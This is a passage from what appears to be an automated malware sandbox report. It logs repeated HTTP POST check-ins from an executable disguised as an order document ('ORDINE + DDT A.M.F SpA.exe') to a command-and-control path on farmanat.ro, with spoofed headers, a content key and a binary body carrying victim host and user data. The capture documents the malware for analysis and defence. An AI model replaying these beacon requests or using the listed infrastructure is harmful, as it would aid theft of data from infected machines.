                                              Nov 25, 2021 10:49:23.271222115 CET6516OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:23.323570013 CET6517INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              143192.168.11.2049984176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:23.750983953 CET6517OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:23.784497976 CET6518OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:23.836504936 CET6518INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              144192.168.11.2049985176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:24.261506081 CET6519OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:24.295780897 CET6519OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:24.345724106 CET6519INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              145192.168.11.2049986176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:24.765311003 CET6520OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:24.799844980 CET6520OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:24.850509882 CET6521INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              146192.168.11.2049987176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:25.270320892 CET6521OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:25.303807974 CET6522OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:25.354125023 CET6522INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              147192.168.11.2049988176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:25.783039093 CET6523OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:25.816695929 CET6523OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:25.870491982 CET6523INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              148192.168.11.2049989176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:26.316917896 CET6524OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:26.351032019 CET6524OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:26.402348042 CET6525INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              149192.168.11.2049990176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:26.841394901 CET6525OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:26.874670982 CET6526OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:26.926106930 CET6526INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              15192.168.11.2049850176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:10.692074060 CET6326OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:10.726584911 CET6326OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:10.784281969 CET6327INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              150192.168.11.2049991176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:27.357925892 CET6527OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:27.392189026 CET6527OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:27.442270994 CET6527INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              151192.168.11.2049992176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:27.861742973 CET6528OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:27.896306038 CET6528OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:27.946178913 CET6529INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              152192.168.11.2049993176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:28.402900934 CET6529OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:28.436259985 CET6530OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:28.491888046 CET6530INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              153192.168.11.2049994176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:28.926177979 CET6531OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:28.960627079 CET6531OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:29.014986992 CET6531INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              154192.168.11.2049995176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:29.395169020 CET6532OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:29.428569078 CET6532OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:29.493921041 CET6533INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              155192.168.11.2049996176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:29.871512890 CET6533OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:29.905167103 CET6534OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:29.953989983 CET6534INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              156192.168.11.2049997176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:30.393507004 CET6535OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:30.427990913 CET6535OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:30.483016968 CET6535INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              157192.168.11.2049998176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:30.922836065 CET6536OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:30.956326962 CET6536OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:31.011261940 CET6537INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              158192.168.11.2049999176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:31.432080984 CET6537OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:31.466260910 CET6538OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:31.517405033 CET6538INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              159192.168.11.2050000176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:31.950901031 CET6539OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:31.984535933 CET6539OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:32.039340973 CET6539INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              16192.168.11.2049851176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
